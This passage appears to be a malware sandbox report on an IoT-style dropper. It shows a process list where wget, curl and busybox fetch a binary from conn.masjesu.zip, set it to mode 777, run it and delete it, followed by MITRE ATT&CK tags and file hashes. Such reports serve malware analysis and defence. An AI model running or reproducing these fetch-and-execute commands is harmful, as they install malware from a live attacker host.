  - PID 932  /bin/rm  cmd: rm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy
  - PID 933  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [System Network Configuration Discovery]
  - PID 934  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [Checks CPU configuration; System Network Configuration Discovery]
  - PID 935  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 936  /bin/chmod  cmd: chmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  [File and Directory Permissions Modification]
  - PID 937  /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H  cmd: ./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
  - PID 938  /bin/rm  cmd: rm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads
- Filesize: 101KB
  MD5: a7e686eb3f74b104a5520f08cfd54eb5
  SHA1: 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
  SHA256: 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
  SHA512: 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
- Filesize: 158KB
  MD5: d8e96e2fdd3c610ec19128e18de5abde
  SHA1: 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
  SHA256: f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
  SHA512: 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
- Filesize: 210B
  MD5: 19c85b70740fc3a3f642e17edd7313a4
  SHA1: 8d12881a4937bef830e0e8fa3cb991ad58189dac
  SHA256: 7ac6d97d0c9ae66b26a3b75b63fa16f76b5abdbd5798dc1563aeeba141cb79a7
  SHA512: 776689ae1665d31cc792f64a4d58179f485dcda1a487ec4f43e743b52504662c7b305834d0ec6733a38cabe6e8cbc8854e0b5f1c2fd1998b2e047bffd24fe3d9